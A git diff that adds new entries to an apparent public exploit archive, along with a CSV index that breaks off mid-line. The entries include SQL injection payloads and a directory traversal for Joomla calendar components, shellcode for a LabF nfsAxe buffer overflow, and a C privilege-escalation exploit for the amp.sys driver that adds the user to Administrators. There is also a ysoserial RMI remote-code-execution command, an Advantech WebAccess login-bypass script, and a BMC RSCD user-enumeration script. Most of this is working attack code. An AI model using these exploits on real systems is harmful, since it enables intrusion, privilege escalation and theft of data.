diff --git a/exploits/php/webapps/43931.txt b/exploits/php/webapps/43931.txt new file mode 100644 index 000000000..14ca1e1ee --- /dev/null +++ b/exploits/php/webapps/43931.txt @@ -0,0 +1,24 @@ +# # # # # +# Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal +# Dork: N/A +# Date: 30.01.2018 +# Vendor Homepage: http://www.joomlacalendars.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/picture-calendar-for-joomla/ +# Version: 3.1.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-6397 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# Directory Traversal... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list.php?folder=[DIRECTORY] +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43932.txt b/exploits/php/webapps/43932.txt new file mode 100644 index 000000000..a3c842e44 --- /dev/null +++ b/exploits/php/webapps/43932.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection +# Dork: N/A +# Date: 30.01.2018 +# Vendor Homepage: http://www.joomlacalendars.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/cp-event-calendar/ +# Version: 3.0.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-6398 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_cpeventcalendar&task=load&id=[SQL] +# +# %2d%31%20%20%2f%2a%21%30%36%36%36%36%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%36%36%36%36%53%45%4c%45%43%54%2a%2f%20CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: option=com_cpeventcalendar&task=load&id=1 AND 6741=6741 +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: option=com_cpeventcalendar&task=load&id=1 AND (SELECT 7531 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(7531=7531,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Type: AND/OR time-based blind +# Title: MySQL <= 5.0.11 AND time-based blind (heavy query - comment) +# Payload: option=com_cpeventcalendar&task=load&id=1 AND 3954=BENCHMARK(5000000,MD5(0x4573626a))# +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 7 columns +# Payload: option=com_cpeventcalendar&task=load&id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a707671,0x4a61716b6d59557a4f5a496f7676584d57444e514d4d78626d42546e786d79747350424271687555,0x717a6a7a71),NULL,NULL,NULL-- cJFi +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43933.txt b/exploits/php/webapps/43933.txt new file mode 100644 index 000000000..833fe8d2c --- /dev/null +++ b/exploits/php/webapps/43933.txt @@ -0,0 +1,41 @@ +# # # # # +# Exploit Title: Joomla! Component Visual Calendar 3.1.3 - SQL Injection +# Dork: N/A +# Date: 30.01.2018 +# Vendor Homepage: http://www.joomlacalendars.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/visual-calendar/ +# Version: 3.1.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-6395 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_visualcalendar&view=load&id=[SQL] +# +# -1%20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2c0x35%2c0x36%2d%2d%20%2d +# +# -1%20%20/*!06666UNION*/%20/*!06666SELECT*/%201%2c0x32%2c(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x34%2c0x35%2c0x36%2d%2d%20%2d +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 AND 2616=2616 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 AND SLEEP(5) +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 6 columns +# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 UNION ALL SELECT CONCAT(0x716a627a71,0x586a6c7676787a6f684c73745863744b7955784a47534d58797158564a53716d6b57434f6141536c,0x71786b6a71),NULL,NULL,NULL,NULL,NULL-- QpYd +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/dos/43930.py b/exploits/windows/dos/43930.py new file mode 100755 index 000000000..6cc25a7ae --- /dev/null +++ b/exploits/windows/dos/43930.py @@ -0,0 +1,70 @@ +#!/usr/bin/python +######################################################################################################## +# Exploit Author: Miguel Mendez Z +# Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow +# Date: 29-01-2018 +# Software: LabF nfsAxe +# Version: v3.7 +# Vendor Homepage: http://www.labf.com +# Software Link: http://www.labf.com/download/nfsaxe.exe +# Tested on: Windows 7 x86 +######################################################################################################## + +import struct + +ropAlignEsp = ( +"\x83\xEC\x58" #SUB ESP,58 +"\x83\xEC\x58" #SUB ESP,58 +"\x83\xEC\x58" #SUB ESP,58 +"\x83\xEC\x58" #SUB ESP,58 +"\x83\xEC\x10" #SUB ESP,10 +"\xFF\xE4" #JMP ESP +) + +scode = "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF +scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111 +scode += "\x51" #PUSH ECX +scode += "\x68\x31\x30\x73\x21" #PUSH 31307321 +scode += "\x68\x73\x31\x6b\x72" #PUSH 73316b72 +scode += "\x68\x5f\x62\x79\x5f" #PUSH 5f62795f +scode += "\x68\x70\x77\x6e\x64" #PUSH 70776e64 +scode += "\x68\x42\x30\x66\x5f" #PUSH 4230665f +scode += "\x8B\xD4" #MOV EDX,ESP +scode += "\x48" #DEC EAX +scode += "\x50" #PUSH EAX +scode += "\x52" #PUSH EDX +scode += "\x52" #PUSH EDX +scode += "\x50" #PUSH EAX +scode += "\xBA\x11\xEA\x1A\x76" #MOV EDX,USER32.MessageBoxA() (Change) +scode += "\xFF\xD2" #CALL EDX +#-------------- +scode += "\x33\xD2" #XOR EDX,EDX +scode += "\xB9\xEF\xEE\xEE\xEE" #MOV ECX,EEEEEEEF +scode += "\x81\xC1\x11\x11\x11\x11" #ADD ECX,11111111 +scode += "\x51" #PUSH ECX +scode += "\x68\x63\x61\x6c\x63" #PUSH 0x63616c63 +scode += "\x8B\xD4" #MOV EDX,ESP +scode += "\x52" #PUSH EDX +scode += "\x33\xD2" #XOR EDX,EDX +scode += "\xBA\x6F\xB1\x0F\x76" #MOV EDX,msvcrt.system - 0x760fb16f (Change) +scode += "\xFF\xD2" #CALL EDX +#-------------- +scode += "\x50" #PUSH EAX +scode += "\xB8\xE2\xBB\xB5\x75" #MOV EAX,kernel32.ExitProcess() (Change) +scode += "\xFF\xD0" #CALL EAX + +offset = "Host: "+scode+"A"*(1000-len(scode))+"\n" +offset += "File(s): "+"B"*33 +offset += struct.pack(" +#include +#include + +#pragma comment(lib,"advapi32.lib") + +#define MSIEXECKEY "MACHINE\\SYSTEM\\CurrentControlSet\\services\\msiserver" + +#define SystemHandleInformation 16 +#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L) + + +typedef unsigned __int64 QWORD; + + +typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO +{ + ULONG ProcessId; + UCHAR ObjectTypeNumber; + UCHAR Flags; + USHORT Handle; + QWORD Object; + ACCESS_MASK GrantedAccess; +} SYSTEM_HANDLE, *PSYSTEM_HANDLE; + + +typedef struct _SYSTEM_HANDLE_INFORMATION +{ + ULONG NumberOfHandles; + SYSTEM_HANDLE Handles[1]; +} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; + + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + ULONG SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + + + + +QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID) +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_HANDLE_INFORMATION pSysHandleInfo; + ULONG i; + PSYSTEM_HANDLE pHandle; + QWORD TokenAddress = 0; + DWORD nSize = 4096; + DWORD nReturn; + BOOL tProcess; + HANDLE hToken; + + + if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE) + { + printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError()); + return -1; + } + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + do + { + nSize += 4096; + pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize); + } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH); + + printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken); + + for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++) + { + + if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken) + { + TokenAddress = pSysHandleInfo->Handles[i].Object; + } + } + + HeapFree(GetProcessHeap(), 0, pSysHandleInfo); + return TokenAddress; +} + + + +int TakeOwnership() +{ + HANDLE token; + PTOKEN_USER user = NULL; + PACL pACL = NULL; + EXPLICIT_ACCESS ea; + DWORD dwLengthNeeded; + + + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token)) + { + printf("\n[-] OpenProcessToken failed %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] OpenProcessToken successful"); + + if (!GetTokenInformation(token, TokenUser, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) + { + printf("\n[-] Failed to initialize GetTokenInformation %d\n\n", GetLastError()); + ExitProcess(1); + } + + user = (PTOKEN_USER)LocalAlloc(0, dwLengthNeeded); + + if (!GetTokenInformation(token, TokenUser, user, dwLengthNeeded, &dwLengthNeeded)) + { + printf("\n[-] GetTokenInformation failed %d\n\n", GetLastError()); + ExitProcess(1); + } + + ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); + +// build DACL + + ea.grfAccessPermissions = KEY_ALL_ACCESS; + ea.grfAccessMode = GRANT_ACCESS; + ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT; + ea.Trustee.TrusteeForm = TRUSTEE_IS_SID; + ea.Trustee.TrusteeType = TRUSTEE_IS_USER; + ea.Trustee.ptstrName = (LPTSTR)user->User.Sid; + + if (SetEntriesInAcl(1, &ea, NULL, &pACL) != ERROR_SUCCESS) + { + printf("\n[-] SetEntriesInAcl failure\n\n"); + ExitProcess(1); + } + printf("\n[+] SetEntriesInAcl successful"); + +// Take ownership + + if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, user->User.Sid, NULL, NULL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to obtain the object's ownership %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Ownership '%s' successful", MSIEXECKEY); + +// Modify DACL + + if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pACL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to modify the object's DACL %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Object's DACL successfully modified"); + + LocalFree(pACL); + CloseHandle(token); + + return 0; +} + + + +int RestorePermissions() +{ + PACL pOldDACL = NULL; + PSID pSIDAdmin = NULL; + SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY; + + + + printf("\n[*] Restoring all permissions and value"); + +// Restore registry value + + WriteToRegistry("%systemroot%\\system32\\msiexec.exe /V"); + +// Sid for the BUILTIN\Administrators group + + if (!AllocateAndInitializeSid(&SIDAuthNT, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pSIDAdmin)) + { + printf("\nAllocateAndInitializeSid failed %d\n\n", GetLastError()); + ExitProcess(1); + } + +// Restore key ownership + + if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, pSIDAdmin, NULL, NULL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to restore the object's ownership %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Object's ownership successfully restored"); + +// Take copy of parent key + + if (GetNamedSecurityInfo("MACHINE\\SYSTEM\\CurrentControlSet\\Services", SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to copy parent key object's DACL %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Parent key object's DACL successfully saved"); + +// Restore key permissions + + if (SetNamedSecurityInfo(MSIEXECKEY, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION | UNPROTECTED_DACL_SECURITY_INFORMATION, NULL, NULL, pOldDACL, NULL) != ERROR_SUCCESS) + { + printf("\n[-] Failed to restore the object's DACL %d\n\n", GetLastError()); + ExitProcess(1); + } + printf("\n[+] Object's DACL successfully restored"); + + FreeSid(pSIDAdmin); + + return 0; +} + + + +int WriteToRegistry(char command[]) +{ + HKEY hkeyhandle; + + if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\services\\msiserver", 0, KEY_WRITE, &hkeyhandle) != ERROR_SUCCESS) + { + printf("\n[-] Registry key failed to open %d\n\n", GetLastError()); + ExitProcess(1); + } + + if (RegSetValueEx(hkeyhandle, "ImagePath", 0, REG_EXPAND_SZ, (LPBYTE) command, strlen(command)) != ERROR_SUCCESS) + { + printf("\n[-] Registry value failed to write %d\n\n", GetLastError()); + ExitProcess(1); + } + + printf("\n[+] Registry key opened and value modified"); + + RegCloseKey(hkeyhandle); + + return 0; +} + + + +int TriggerCommand() +{ + STARTUPINFO si; + PROCESS_INFORMATION pi; + + + ZeroMemory(&si, sizeof(si)); + ZeroMemory(&pi, sizeof(pi)); + si.cb = sizeof(si); + + if (!CreateProcess(NULL, "c:\\windows\\system32\\msiexec.exe /i poc.msi /quiet", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) + { + printf("\n[-] CreateProcess failed %d", GetLastError()); + ExitProcess(1); + } + printf("\n[+] c:\\windows\\system32\\msiexec.exe launched"); + printf("\n[i] Account should now be in the local administrators group"); + + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); + + return 0; +} + + + +int main(int argc, char *argv[]) +{ + QWORD TokenAddressTarget; + QWORD SepPrivilegesOffset = 0x40; + QWORD TokenAddress; + HANDLE hDevice; + char devhandle[MAX_PATH]; + DWORD dwRetBytes = 0; + QWORD inbuffer1[3] = {0}; + QWORD inbuffer2[3] = {0}; + QWORD ptrbuffer[1] = {0}; // QWORD4 - Has to be 0 for arbitrary write value to be 0xfffffffe + DWORD currentusersize; + char currentuser[100]; + char netcommand[MAX_PATH]; + + + + printf("-------------------------------------------------------------------------------\n"); + printf(" System Shield AntiVirus & AntiSpyware (amp.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on 64bit Windows 7 / Windows 10 (1709) \n"); + printf("-------------------------------------------------------------------------------\n"); + + TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId()); + printf("\n[i] Address of current process token 0x%p", TokenAddress); + + TokenAddressTarget = TokenAddress + SepPrivilegesOffset; + printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten", TokenAddressTarget); + + inbuffer1[0] = 0x8; // QWORD1 - Cannot be more than 8. Also different values (<9) calculates to different sub calls + inbuffer1[1] = ptrbuffer; // QWORD2 - Address used for read and write + inbuffer1[2] = TokenAddressTarget+1; // QWORD3 - Arbitrary write address !!! + + inbuffer2[0] = 0x8; + inbuffer2[1] = ptrbuffer; + inbuffer2[2] = TokenAddressTarget+9; + + sprintf(devhandle, "\\\\.\\%s", "amp"); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if(hDevice == INVALID_HANDLE_VALUE) + { + printf("\n[-] Open %s device failed\n\n", devhandle); + return -1; + } + else + { + printf("\n[+] Open %s device successful", devhandle); + } + + printf("\n[~] Press any key to continue . . .\n"); + getch(); + + DeviceIoControl(hDevice, 0x00226003, inbuffer1, sizeof(inbuffer1), NULL, 0, &dwRetBytes, NULL); + DeviceIoControl(hDevice, 0x00226003, inbuffer2, sizeof(inbuffer2), NULL, 0, &dwRetBytes, NULL); + + printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n"); + CloseHandle(hDevice); + + currentusersize = sizeof(currentuser); + + if (!GetUserName(currentuser, ¤tusersize)) + { + printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError()); + return -1; + } + + printf("[*] Adding current user '%s' account to the local administrators group", currentuser); + + sprintf(netcommand, "net localgroup Administrators %s /add", currentuser); + + TakeOwnership(); + WriteToRegistry(netcommand); + TriggerCommand(); + Sleep(1000); + RestorePermissions(); + printf("\n\n"); + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/remote/43927.txt b/exploits/windows/remote/43927.txt new file mode 100644 index 000000000..33139ed26 --- /dev/null +++ b/exploits/windows/remote/43927.txt @@ -0,0 +1,13 @@ +# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability +# Date: 01-28-2018 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: www.hpe.com +# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber= +# Version: iMC PLAT v7.3 (E0504) Standard +# Tested on: Windows Server 2008 R2 Enterprise 64-bit +# CVE : CVE-2017-5792 +# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/ + +# note that this PoC will launch calc.exe + +$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe \ No newline at end of file diff --git a/exploits/windows/webapps/43928.py b/exploits/windows/webapps/43928.py new file mode 100755 index 000000000..9a157b422 --- /dev/null +++ b/exploits/windows/webapps/43928.py @@ -0,0 +1,98 @@ +#!/usr/bin/python2.7 + +# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability +# Date: 01-13-2018 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: www.advantech.com +# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe +# Version: Advantech WebAccess 8.0-2015.08.16 +# Tested on: Windows Server 2008 R2 Enterprise 64-bit +# CVE : CVE-2017-16716 +# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/ + +# Notes: +# +# There are two service interfaces: +# 1) SOAP +# 2) REST +# +# This PoC targets REST +# +# The web services did not work out of the box, and a new website/app was created in IIS for testing. +# This issue was potentially due to the fact that testing was completed against a trial version. +# PoC may need slight tweaks depending on configuration of the web service. +# +# Original vulnerability was reported for more recent software version. +# +# This WebAccessAuthBypass class can be imported :-) + +import sys, requests +from xml.etree import ElementTree + +class WebAccessAuthBypass: + def __init__(self, ip, port): + self.ip = ip + self.port = port + self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port) + + def convert_entities(self, s): + return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing + + def get_project_list(self): + print 'Getting list of projects...' + res = requests.get(self.base_url) + projects = list() + if res.status_code != 200: + print 'Bad HTTP response...' + else: + if 'PROJECT' not in res.text: + print 'No projects listed by service.' + else: + s = self.convert_entities(res.text) + xml = ElementTree.fromstring(s) + for project_list in xml: + for project in project_list: + name = project.get('NAME') + if name is not None: + projects.append(name) + if len(projects) > 0: + print 'Found the following projects: ' + str(projects) + return projects + else: + return None + + # returns a token + def login(self, project): + # SQL Injection into the user parameter + url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x + res = requests.get(url) + token = None + if res.status_code != 200: + print 'Bad HTTP response...' + else: + if 'OK TOKEN' not in res.text: + print 'No token returned by service.' + else: + s = self.convert_entities(res.text) + xml = ElementTree.fromstring(s) + if len(xml) > 0: + token = xml[0].get('TOKEN') + return token + + # token returned can be used for more transactions + def get_token(self): + project_list = self.get_project_list() + project = project_list[0] # might as well pick the first project + token = self.login(project_list[0]) + return token + +if __name__ == "__main__": + ip = 'targetip' + port = 'port#' + bypass = WebAccessAuthBypass(ip, port) + token = bypass.get_token() + + if token is not None: + print 'Successfully got an authentication token: ' + token + else: + print 'Unsuccessful.' \ No newline at end of file diff --git a/exploits/windows/webapps/43934.py b/exploits/windows/webapps/43934.py new file mode 100755 index 000000000..ad99167db --- /dev/null +++ b/exploits/windows/webapps/43934.py @@ -0,0 +1,166 @@ +# Exploit Title: BMC BladeLogic RSCD agent get Windows users +# Filename: BMC_winUsers.py +# Github: https://github.com/bao7uo/bmc_bladelogic +# Date: 2018-01-27 +# Exploit Author: Paul Taylor / Foregenix Ltd +# Website: http://www.foregenix.com/blog +# Version: BMC RSCD agent 8.3.00.64 +# CVE: CVE-2016-5063 +# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-windows-rscd-agent-vulnerability-in-bmc-server-automation-cve-2016-5063 +# Tested on: 8.3.00.64 + +#!/usr/bin/python2 + +# Retrieving Windows system users with BMC BladeLogic RSCD agent +# Tested against v8.3.00.64 (Windows version) +# CVE-2016-5063 + +# Author: Paul Taylor / Foregenix Ltd +# github.com/bao7uo/bmc_bladelogic +# www.foregenix.com/blog + +# Credits: +# Converted to work against Windows version +# from the Linux BMC getUsers exploit by ERNW + +import socket +import ssl +import sys +import requests +import argparse +import xml.etree.ElementTree as ET +import xml.dom.minidom +import httplib +from requests.packages.urllib3 import PoolManager +from requests.packages.urllib3.connection import HTTPConnection +from requests.packages.urllib3.connectionpool import HTTPConnectionPool +from requests.adapters import HTTPAdapter + + +class MyHTTPConnection(HTTPConnection): + def __init__(self, unix_socket_url, timeout=60): + HTTPConnection.__init__(self, HOST, timeout=timeout) + self.unix_socket_url = unix_socket_url + self.timeout = timeout + + def connect(self): + self.sock = wrappedSocket + + +class MyHTTPConnectionPool(HTTPConnectionPool): + def __init__(self, socket_path, timeout=60): + HTTPConnectionPool.__init__(self, HOST, timeout=timeout) + self.socket_path = socket_path + self.timeout = timeout + + def _new_conn(self): + return MyHTTPConnection(self.socket_path, self.timeout) + + +class MyAdapter(HTTPAdapter): + def __init__(self, timeout=60): + super(MyAdapter, self).__init__() + self.timeout = timeout + + def get_connection(self, socket_path, proxies=None): + return MyHTTPConnectionPool(socket_path, self.timeout) + + def request_url(self, request, proxies): + return request.path_url + + +def optParser(): + parser = argparse.ArgumentParser(description="Retrieving system users with BMC BladeLogic Server Automation RSCD agent") + parser.add_argument("host", help="IP address of a target system") + parser.add_argument("-p", "--port", type=int, default=4750, help="TCP port (default: 4750)") + opts = parser.parse_args() + return opts + + +init = """RemoteServer.intro2015-11-19-16-10-30-392095870;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;8.6.01.66""" +getVersion = """RemoteServer.getVersion""" +getWindowsUsers = """RemoteUser.getUserContentstypeNameOShost0.0.0.0containerstringvaluelongValue1kind1path/1""" +getHostOverview = """RemoteServer.getHostOverview""" + +options = optParser() +PORT = options.port +HOST = options.host + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect((HOST, PORT)) + +sock.sendall("TLSRPC") + +wrappedSocket = ssl.wrap_socket(sock) + +adapter = MyAdapter() +s = requests.session() +s.mount("http://", adapter) + +print "Sending intro..." +r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=init) + +print "Getting version..." +r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getVersion) + +rootVersion = ET.fromstring(r.content) +print "=========================" +print "Major version : " + rootVersion[0][0][0][0][0][1].text +print "Minor version : " + rootVersion[0][0][0][0][1][1].text +print "Patch version : " + rootVersion[0][0][0][0][2][1].text +print "Platform version: " + rootVersion[0][0][0][0][3][1].text +print "=========================\n" + +print "Getting host overview..." +r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getHostOverview) + +rootOverview = ET.fromstring(r.content) +print rootOverview[0][0][0][0][12][1].text + +linux = False + +if rootOverview[0][0][0][0][0][1].text is not None: + linux = True + +print "==================================================" +print "Agent instal dir: " + rootOverview[0][0][0][0][1][1].text +print "Licensed? : " + ("false" if (int(rootOverview[0][0][0][0][2][1][0].text) == 0) else "true") +print "Repeater? : " + ("false" if (int(rootOverview[0][0][0][0][12][1][0].text) == 0) else "true") +print "Hostname : " + rootOverview[0][0][0][0][6][1].text +print "Netmask : " + rootOverview[0][0][0][0][13][1].text +print "CPU architecture: " + rootOverview[0][0][0][0][10][1].text +print "Platform (OS) : " + rootOverview[0][0][0][0][14][1].text +print "OS version : " + rootOverview[0][0][0][0][15][1].text +print "OS architecture : " + rootOverview[0][0][0][0][3][1].text +print "OS release : " + rootOverview[0][0][0][0][11][1].text +print "Patch level : " + rootOverview[0][0][0][0][7][1].text +print "==================================================\n" + +print "Sending request for users...\n" + +r = s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc', data=getWindowsUsers) + +with open("./users.xml", "w") as text_file: + text_file.write(r.content) + +root = ET.parse('./users.xml').getroot() +count = 0 +ind = 1 +while ind: + try: + ind = root[0][0][0][0][0][count][0][14][1].text + except IndexError: + pass + break + count += 1 + +print "Number of users found: " + str(count) + "\n" +for i in range(0, count): + print "Username: "+ root[0][0][0][0][0][i][0][14][1].text + print "SID: " + root[0][0][0][0][0][i][0][12][1].text + print "Comment: " + root[0][0][0][0][0][i][0][2][1].text + + print "........................\n" + + +wrappedSocket.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b384f2901..24f49be83 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5482,6 +5482,7 @@ id,file,description,date,author,type,platform,port 43903,exploits/multiple/dos/43903.txt,"Artifex MuJS 1.0.2 - Denial of Service",2018-01-28,"Andrea Sindoni",dos,multiple, 43904,exploits/multiple/dos/43904.txt,"Artifex MuJS 1.0.2 - Integer Overflow",2018-01-28,"Andrea Sindoni",dos,multiple, 43923,exploits/macos/dos/43923.c,"macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding",2018-01-29,"Google Security Research",dos,macos, +43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows, 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
